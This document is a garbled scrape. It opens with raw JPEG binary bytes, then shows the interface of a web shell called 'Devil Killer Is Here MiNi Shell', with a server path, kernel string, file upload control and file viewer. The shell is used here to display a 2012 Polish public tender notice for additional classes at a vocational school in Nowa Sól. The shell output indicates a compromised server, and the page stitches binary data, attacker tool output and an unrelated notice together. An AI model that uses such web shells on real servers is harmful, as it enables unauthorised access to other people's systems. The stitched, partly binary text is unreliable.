JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120618/206626-N-2012.html

<p class="kh_header"><b>Nowa Sól: Usługi edukacyjne obejmujące zorganizowanie i przeprowadzenie dodatkowych zajęć dla uczniów ZSP nr 1 w Nowej Soli</b><br>
<b>Numer ogłoszenia: 206626 - 2012; data zamieszczenia: 18.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych Nr 1 "Elektryk" , ul. Witosa 25, 67-100 Nowa Sól, woj. lubuskie, tel. 68 47555-59, faks 68 47555-40 lub 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zsp1-elektryk.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna nieposiadajaca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne obejmujące zorganizowanie i przeprowadzenie dodatkowych zajęć dla uczniów ZSP nr 1 w Nowej Soli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Kategoria według Słownika Zamówień (CPV):
80000000-4 - Usługi edukacyjne i szkoleniowe;
80210000-9 - Usługi edukacji technicznej i zawodowej na poziomie szkoły średniej.
2.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie dodatkowych zajęć dla uczniów ZSP nr 1 /Elektryk/ w Nowej Soli w w ramach projektu /Wiedza z /Elektryka/ - mój sukces zawodowy/ Program Operacyjny Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.
3.	Usługa obejmuje przygotowanie i przeprowadzenie szkoleń, kursów, zajęć wyrównawczych i dodatkowych w siedzibie zamawiającego i z wykorzystaniem sprzętu będącego w dyspozycji zamawaiajacego - w roku szkolnym 2012/2013 i w roku szkolnym 2013/2014 - dla niżej wymienionych działań i zadań objętych projektem oraz w określonym wymiarze godzin dydaktycznych (przez godzinę dydaktyczną należy rozumieć 45 minut zajęć):
1)	DZIAŁANIE 1 - /W matni sieci/- autorskie zajęcia rozszerzające wiadomości z zakresu ICT. Łącznie 1000 godzin dydaktycznych. Zajęcia 200 godzin dla  dwóch grup po 15 uczniów tj. 1 grupa w roku szkolnym 2012/13 i 1 grupa w roku szkolnym 2013/14) - dla każdego z 5-ciu niżej wymienionych zadań:
Zadanie 1.1. Akademia CISCO - 2 lata po 100 godzin.
Zadanie 1.2. Projektowanie AutoCad - 2 lata po 100 godzin.
Zadanie 1.3. Grafika komputerowa - 2 lata po 100 godzin.
Zadanie 1.4. System zarządzania treścią JOOMLA (CMS) - 2 lata po 100 godzin.
Zadanie 1.5. Administracja serwera MS SQL - 2 lata po 100 godzin.
2)	DZIAŁANIE 2 - Moja ścieżka edukacyjna-doradztwo zawodowe i pedagogiczno-psychologiczne. Łącznie 840 godzin dydaktycznych.
Zadanie 2.1. Doradztwo zawodowe dla maturzystów - uczestników projektu. Zajecia 3 godz. tygodniowo*35 tygodni w roku szkolnym*2 lata. Produkt: 100 analiz indywidualnych predyspozycji zawodowych.
Zadanie 2.2. Doradztwo zawodowe dla uczniów klas pierwszych i innych uczestników projektu poza maturzystami. Zajecia 3 godz. tygodniowo*35 tygodni w roku szkolnym*2 lata. Produkt: 100 analiz indywidualnych predyspozycji zawodowych.
Zadanie 2.3. Doradztwo psychologiczne dla uczniów - uczestników projektu. Zajęcia 6 godz. tygodniowo*35 tygodni w roku szkolnym*2 lata. Produkt: 230 porad indywidualnych lub zespołowych psychologa.
3)	DZIAŁANIE 3 - Koło Młodych Ekonomistów. Łącznie 140 godzin dydaktycznych.
Dodatkowe zajęcia edukacyjne dwujęzyczne, polsko-niemieckie, dla uczniów uzdolnionych z kierunku technik ekonomista. Zajęcia dla 1grupy - min. 15 uczniów, *70 godzin w roku szkolnym*2 lata.
4)	DZIAŁANIE 4 - Warsztaty antydyskryminacyjne - 3 moduły: Stereotypy ról kobiet i mężczyzn; Dyskryminacja; Tolerancja a niepełnosprawność. Łącznie 180 godzin dydaktycznych. Dwóch prowadzących. Zajęcia 5 godz. tygodniowo*2prowadzących*9 tygodni  w roku szkolnym*2 lata (jeden prowadzący 90 godzin). Średnio po 20 uczniów zainteresowanych, razem 120 uczniów.
5)	DZIAŁANIE 6 - /Sam liczę/- autorskie zajęcia wyrównujące wiedzę i umiejętności z matematyki dla uczniów klas I-wszych. Łącznie 432 godziny dydaktyczne. Zajęcia: 3 grupy po 15 uczniów w roku szkolnym 2012/2013 - 72 godziny na grupę i 3 grupy po 15 uczniów w roku szkolnym 2013/2014 - 72 godziny na grupę.
Zadanie 1 - /Sam liczę/ zajęcia wyrównujące grupa 1.
Zadanie 2 - /Sam liczę/ zajęcia wyrównujące grupa 2.
Zadanie 3 - /Sam liczę/ zajęcia wyrównujące grupa 3.
6)	DZIAŁANIE 7 - /Ja obywatel świata/- autorskie zajęcia z języków obcych. Łącznie 576 godzin dydaktycznych. Zajęcia: po 2 grupy z j.angielskiego  i j.niemieckiego po 12 osób z każdego języka, każda grupa po 72 godziny zajęć w roku szkolnym*2 lata. Łącznie 576 godzin.
Zadanie 1 - Koło Młodych Poliglotów - język niemiecki.
Zadanie 2 - Koło konwersacyjne - język niemiecki.
Zadanie 3 - - Koło Młodych Poliglotów - język angielski.
Zadanie 4 - Koło konwersacyjne - język angielski.
7)	DZIAŁANIE 8 - Koła Młodych Przyrodników - realizacja  autorskich programów z przedmiotów przyrodniczych: biologii, chemii, fizyki i geografii. Łącznie 576 godzin dydaktycznych. Zajęcia autorskie w 4 grupach po 12 uczniów w grupie i po 72 godziny zajęć w roku szkolnym dla każdej grupy*2 lata. 
Zadanie 1 - Koło biologiczne.
Zadanie 2 - Koło chemiczne.
Zadanie 3  - Koło fizyczne.
Zadanie 4 - Koło geograficzne.
8)	DZIAŁANIE 10 - Zajęcia dydaktyczno-wyrównawcze służące wyrównywaniu dysproporcji edukacyjnych z przedmiotów zawodowych. Łącznie 720 godzin dydaktycznych. Zajęcia dla 5 grup po 15 uczniów (w zawodach: technik elektryk, technik informatyk, technik ekonomista, technik mechatronik, technik teleinformatyk) i po 72 godziny w roku szkolnym dla każdej grupy*2 lata.
Zadanie 1 - Zajęcia  dla ekonomistów.
Zadanie 2 - Zajęcia  dla elektryków.
Zadanie 3  - Zajęcia  dla informatyków.
Zadanie 4 - Zajęcia  dla mechatroników.
Zadanie 5 - Zajęcia  dla teleinformatyków.
4.	Szczegółowy opis przedmiotu zamówienia dla każdego Działania wymienionego w pkt 3 zawiera załącznik nr 1 do SIWZ.
5.	Zamawiający nie dopuszcza składania ofert częściowych.
6.	Szkolenia, kursy, zajęcia odbywać się muszą w terminach określonych przy działaniach (po zakończeniu zajęć dydaktycznych określonych w arkuszu organizacyjnym szkoły i w czasie wolnym od zajęć dla uczniów - od poniedziałku do piątku po godz. 15:15 a w soboty od godz. 8:30.
7.	Wykonawca musi opracować i przedstawić programy zajęć do każdego działania/zadania wg wzoru - wzór programu stanowi załącznik nr 2A do SIWZ. Programy zajęć należy opracować przy uwazględnieniu informacji dotyczących realizacji projektu tj. celów projektu zakładanych do realizacji przez Zamawiajacego, zakładanych rezultatów twardych i miękkich oraz źródeł weryfikacji/pozyskania danych do pomiaru wskaźnika realizacji celów, które opisane są w części II załączniku nr 1 do SIWZ - szczegółowy opis przedmiotu zamówienia.
8.	Dzienniki zajęć z uczestnikami projektu mają być prowadzone w formie elektronicznej WORD, EXCEL.
9.	Wszystkie osoby, które będą brały udział w realizacji zamówienia zobowiązane będą złożyć deklaracje uczestnictwa w realizacji projektu, zgodę na przetwarzanie danych osobowych oraz zgodę na wykorzystanie wizerunku dla celów promocji projektu (zdjęcia, klipy, wideo itp.).
10.	Zamówienie finansowane jest w całości ze środków publicznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.21.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiajacy nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oceny spełniania tego warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oceny spełniania tego warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oceny spełniania tego warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu wykazania przez Wykonawcę spełniania tego warunku - Zamawiający żąda aby Wykonawca wykazał, że: dysponuje lub będzie dysponował kadrą dydaktyczną o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnych do wykonania zamówienia wraz ze wskazaniem zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami. Warunek zostanie spełniony, jeśli wykonawca wykaże, że osoby wskazane do realizacji zamówienia posiadają odpowiednio do rodzaju każdego działania z opisu przedmiotu zamówienia:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym (z wyjątkiem zadania 2.3 w działaniu 2 - doradztwo psychologiczne, gdzie nie jest wymagane przygotowanie pedagogiczne), uprawnieniami do prowadzenia zajęć określonego w działaniu rodzaju  wynikającego z opisu przedmiotu zamówienia - zgodne z Rozporządzeniem Ministra Edukacji narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U Nr 50 poz. 400 z późniejszymi zmianami).
2)	staż pracy w szkole ponadgimnazjalnej w danym zawodzie minimum 3 lata (z wyjątkiem zadania 2.3 w działaniu 2- doradztwo psychologiczne, gdzie staż nie jest wymagany).
3)	oraz dodatkowe warunki dotyczący kwalifikacji: 
-	dla całego działania 8 (Koło Młodych Przyrodników - realizacja autorskich programów z przedmiotów przyrodniczych: biologii, chemii, fizyki i geografii) - wpis na listę egzaminatorów egzaminu maturalnego oraz 
-	dla całego działania 10 (zajęcia dydaktyczno-wyrównawcze służące wyrównywaniu dysproporcji edukacyjnych z przedmiotów zawodowych) - wpis na listę egzaminatorów egzaminu potwierdzającego kwalifikacje zawodowe w technikum,
z jednoczesną informacją o podstawie do dysponowania tymi osobami.

Oceny spełniania tego warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 3 do SIWZ, oraz na podstawie wykazu kadry dydaktycznej, którą dysponuje lub będzie dysponował wykonawca, sporządzonego wg załącznika nr 3B do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oceny spełniania tego warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku ubiegania się wspólnie o udzielenie zamówienia:
1/	Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wraz z ofertą należy złożyć stosowny dokument na potwierdzenie ustanowionego pełnomocnika, z którego ma również wynikać jakich wykonawców będzie reprezentować pełnomocnik i który z wykonawców jest liderem.
2/	każdy z Wykonawców osobno powinien spełniać warunki dotyczące Wykonawców z tym, że dokumenty o których mowa w III.4.1) Wykonawcy składają wspólnie.

OFERTA POWINNA ZAWIERAĆ NIŻEJ WYMIENIONE DOKUMENTY I OŚWIADCZENIA:
1.	Wypełniony formularz ofertowy z podaniem ceny na całość zamówienia - wg załącznika nr 2 do SIWZ.
Do formularza ofertowego należy dołączyć:
2.	Opracowane programy zajęć (do każdego działania/zadania), które w swojej treści mają być zgodne z wymaganiami zawartymi w SIWZ, oraz zawierać informacje zawarte we wzorze programu zajęć, który stanowi załącznik nr 2A do SIWZ.
3.	Oświadczenie o spełnieniu przez Wykonawcę warunków udziału określonych w art. 22 ust. 1 ustawy- wg załącznika nr 3 do specyfikacji.
4.	Wykaz kadry dydaktycznej, która będzie uczestniczyć w realizacji zamówienia - wg załącznika nr 3A do SIWZ. 
5.	Oświadczenie o braku podstaw do wykluczenia z postępowania z powodu nie spełniania warunków określonych w  art. 24 ust 1 ustawy - wg załącznika 4 do specyfikacji.
6.	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy wystawionego nie wcześniej niż 6 m-cy przed upływem terminu do składania ofert.
7.	Oryginalne pełnomocnictwo lub odpis pełnomocnictwa poświadczony notarialnie. Dokument określający zakresu umocowania ma potwierdzać uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
8.	Dokumenty wymagane w przypadku składania oferty wspólnej.
8.1	Wskazanie pełnomocnika do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie zamówienia. Z dokumentu ma również wynikać jakich wykonawców będzie reprezentować pełnomocnik i który z wykonawców jest liderem.
8.2	Oferta winna zawierać oświadczenia i dokumenty dla każdego partnera z osobna dotyczące własnej firmy o których mowa w części VII SIWZ pkt. 3, 5 i 6.
9.	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej.
9.1	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 6 składa dokumenty, zgodnie z opisem zawartym w pkt 4 części IV SIWZ.
UWAGA:
Do celów niniejszego przetargu dopuszcza się przedłożenie wymaganych dokumentów w formie odpisu lub kserokopii poświadczonej przez Wykonawcę /za zgodność z oryginałem/ (wyjątek stanowi pkt 7).
W przypadku przedłożenia kserokopii dokumentów, które składają się z dwóch lub więcej stron - należy poświadczyć /za zgodność z oryginałem/ każdą z tych stron.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40.00</li>
<li>2 - Jakość - ocena merytoryczna programów zajęć - 60.00</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w przypadkach zaistnienia w trakcie realizacji zamówienia istotnych okoliczności, na które zamawiający i wykonawca nie mieli wpływu:
1)	zmiana wykładowcy na wykładowcę o takim samym poziomie wykształcenia i doświadczenia zawodowego, w przypadkach losowych i niezależnych od Wykonawcy. Wykonawca musi uzyskać akceptację Zamawiającego, po niezwłocznym powiadomieniu o zaistniałej sytuacji uzasadniającej okoliczności zmiany oraz przedłożeniu stosownych dokumentów potwierdzających kwalifikacje nowego wykładowcy.
2)	zmiana terminu realizacji zamówienia np. w przypadku zmiany okresu realizacji projektu, zaistnienia siły wyższej mającej wpływ na realizacje zamówienia. Zmiana wymaga zgody obu stron.
3)	zmniejszenie wartości umowy w przypadku zmniejszenia ilości godzin dydaktycznych, np. w sytuacji rezygnacji z zajęć uczestników projektu
4)	inne okoliczności, których Zamawiający ani Wykonawca nie mogli przewidzieć w chwili zawarcia umowy, a które będą miały wpływ na prawidłową realizację Projektu.
Zmiany wymagają formy pisemnej w postaci aneksu do umowy, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zsp1-elektryk.pl/projekt1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ponadgimnazjalnych nr 1 ELEKTRYK ul. W. Witosa 25, 67-100 Nowa Sól i za pośrednictwem poczty elektronicznej e-mail: wnowicki@poczta.onet.pl oraz faksu 68-475-55-40.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2012 godzina 09:00, miejsce: Zespół Szkół Ponadgimnazjalnych nr 1 ELEKTRYK ul. Wincentego Witosa 25, 67-100 Nowa Sól  - pokój nr 17 (I piętro) Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany ze środków Unii Europejskiej pt. / Wiedza z /Elektryka/ - mój sukces zawodowy/ w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
